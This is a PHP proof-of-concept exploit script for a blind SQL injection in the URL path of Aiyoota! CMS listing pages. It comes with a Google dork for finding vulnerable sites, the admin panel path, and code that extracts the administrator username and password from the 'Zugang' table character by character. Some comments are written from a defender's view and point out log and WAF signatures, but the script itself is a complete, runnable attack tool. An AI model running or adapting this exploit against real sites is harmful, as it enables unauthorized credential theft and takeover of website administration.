Aiyoota! CMS remote blind SQL injection exploit.
5fe1f519e4f3e8d6131052331a1e2520afba7ff252c5e3d08ca8a8fedffe9878
<?php
// Proof-of-concept for a boolean-based blind SQL injection in the URL path of
// Aiyoota! CMS listing pages (the naviID path segment, per the banner usage).
// Read this from the defender's side: every request the script makes goes out
// through file_get_contents() with the fixed User-Agent set below, and the
// injected path carries the literal substrings "+and+1=1", "+and+1=0" and
// "+and+ascii(substring((select+" -- each of these is a usable WAF/log
// signature for this tooling, and a single character costs several requests,
// so the traffic pattern is a burst of near-identical GETs to one page.
// The file defines no functions; it is one top-level script driven by $argv.
ini_set("max_execution_time",0); // never time out: the extraction loop below is request-bound
// Fixed UA on every request -- treat as a detection signature, not as real browser traffic.
ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
print_r('
###############################################################
#
# Aiyoota! CMS - Blind SQL Injection Exploit
#
# Vulnerability discovered by: Lidloses_Auge
# Exploit coded by: Lidloses_Auge
# Greetz to: -=Player=- , Suicide, g4ms3, enco,
# Palme, GPM, Free-Hack
# Date: 16.12.2008
#
###############################################################
#
# Dork: inurl:naviid + inurl:liste9
# Admin Panel: [Target]/cms/
# Usage (Method 1 auto): php '.$argv[0].' -1 [Target]
# Usage (Method 2 manually): php '.$argv[0].' -2 [Target] [Language] [valid naviID] [ueber] [aiyootaID] [file]
# Example (Method 1) for http://www.site.com
# => php '.$argv[0].' -1 http://www.site.com
# Example (Method 2) for http://www.site.com/english/8/8/45001/liste9.html
# => php '.$argv[0].' -2 http://www.site.com english 8 8 45001 liste9.html
#
###############################################################
');
// $argv[1] is the method switch ("-1" auto-discovers the URL parts, "-2" takes
// them all from the command line). $automatic itself is never read again.
$automatic = $argv[1];
// $argv[2]: base URL of the site, without a trailing slash (it is concatenated with "/...").
$url = $argv[2];
// NOTE(review): "|" and "&" here are bitwise, not logical. They still behave
// as or/and because PHP casts the booleans to 0/1, but nothing short-circuits.
// Accepted shapes: 3 arguments (method 1) or 8 arguments (method 2); the
// method and the argument count are not cross-checked against each other.
if (($argv[1] == "-1" | $argv[1] == "-2") & ($argc == 3 | $argc == 8)) {
if ($argv[1] == "-1") {
// Method 1: fetch the front page and derive the language segment ($sprache)
// and a full content link ($urlpart) from the first matching "a href='".
$source = file_get_contents($url."/index.html");
$buffer = $source;
// Absolute self-links first. strpos() returns false when there is no match,
// and false != 0 is false under loose comparison, so "not found" (and a match
// at offset 0) both fall through to the relative-link branch below.
if (strpos($source,"a href='$url/") != 0) {
$place = strpos($source,"a href='$url/");
// Language = the path segment directly after "$url/" ("a href='" is 8 chars), up to the next "/".
$sprache = substr($source,$place+8+strlen($url)+1,strpos(substr($source,$place+8+strlen($url)+1),"/"));
// The whole href value, up to its closing single quote.
$urlpart = substr($source,$place+8,strpos(substr($source,$place+8),"'"));
} else {
// Relative links ("a href='/" is 9 chars): while the first such link starts
// with "cms" (the admin panel path from the banner), cut the buffer to it.
while (substr($buffer,strpos($buffer,"a href='/")+9,3) == "cms") {
$buffer = substr($buffer,strpos($buffer,"a href='/"));
}
$place = strpos($buffer, "a href='/");
// Language = first path segment of the relative link.
$sprache = substr($buffer,$place+9,strpos(substr($buffer,$place+9),"/"));
// Re-absolutise the relative href against $url.
$urlpart = $url."/".substr($buffer,$place+9,strpos(substr($buffer,$place+9),"'"));
}
// Split the link right after "<language>/<naviID>": $part1 is the prefix the
// payload is appended to, $part2 the remainder of the path.
$varstart = strpos($urlpart,$sprache)+strlen($sprache)+1;
$injplace = strpos(substr($urlpart,$varstart),"/") + $varstart;
$part1 = substr($urlpart,0,$injplace);
$part2 = substr($urlpart,$injplace);
} elseif ($argv[1] == "-2") {
// Method 2: [Target]/[Language]/[naviID] and /[ueber]/[aiyootaID]/[file] given explicitly.
$part1 = $url."/".$argv[3]."/".$argv[4];
$part2 = "/".$argv[5]."/".$argv[6]."/".$argv[7];
}
echo "\nExploiting now!\n\n";
// Baselines: the same page with an always-true and an always-false condition
// appended to the naviID segment. All later decisions are made by comparing
// response lengths against these two (no content parsing).
$true = file_get_contents($part1."+and+1=1".$part2);
$false = file_get_contents($part1."+and+1=0".$part2);
$inj = $false;
// Columns read from table "Zugang" (German: access): benutzer = user, passwort = password.
$tbl = array("benutzer","passwort");
// Only proceed when true/false responses differ in size, i.e. the page reacts to the condition.
if (strlen($false) != strlen($true)) {
for ($mode = 0; $mode <= 1; $mode++) {
echo $tbl[$mode].": ";
// $break and $count are not initialised before their first use: null == 0
// holds and null++ yields 1, so $count starts at 1, matching MySQL's 1-based
// substring() offset. Both are reset explicitly at the end of each column.
while ($break == 0) {
$count++;
// Five range probes on the ASCII code of character $count; the response is
// taken as "true" when it is more than 2% longer than the false baseline.
$injpart1 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>96".$part2);
$injpart2 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>108".$part2);
$injpart3 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<=96".$part2);
$injpart4 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<70".$part2);
$injpart5 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<58".$part2);
// Lower-case letters: >108 selects the upper half, otherwise the lower half.
if (strlen($false) / strlen($injpart1) * 100 < 98) {
if (strlen($false) / strlen($injpart2) * 100 < 98) {
$border1 = 103;
$border2 = 122;
} else {
$border1 = 96;
$border2 = 108;
}
}
// Code <= 96: digits (<58), punctuation/upper-case start (<70), or 70..96.
// If no probe matches, $border1/$border2 keep their value from the previous character.
if (strlen($false) / strlen($injpart3) * 100 < 98) {
if (strlen($false) / strlen($injpart4) * 100 < 98) {
if (strlen($false) / strlen($injpart5) * 100 < 98) {
$border1 = 47;
$border2 = 57;
} else {
$border1 = 59;
$border2 = 69;
}
} else {
$border1 = 70;
$border2 = 96;
}
}
// Linear scan of the chosen range; "$i = $border2+1" is the loop's break.
for ($i = $border1; $i<=$border2; $i++) {
// End-of-value check (ascii() of a character past the end is 0); this request
// is re-issued on every iteration of the scan, not once per character.
$zero = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))=0".$part2);
if (strlen($false) / strlen($zero) * 100 < 98) {
$break = 1;
echo "\n";
$i = $border2+1;
} else {
// ">$i" false (response more than 2% shorter than the true baseline) means
// the code is <= $i; since the scan ascends, the first hit is the character.
$inj = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>$i".$part2);
if ((strlen($inj) / strlen($true) * 100) < 98) {
echo chr($i);
$i = $border2+1;
}
}
}
}
// Reset the per-column state before moving on to the next column.
$break = 0;
$count = 0;
}
}
} else {
echo "\nOoops, you did a mistake. Correct count of arguments? Correct Method?\n";
}
?>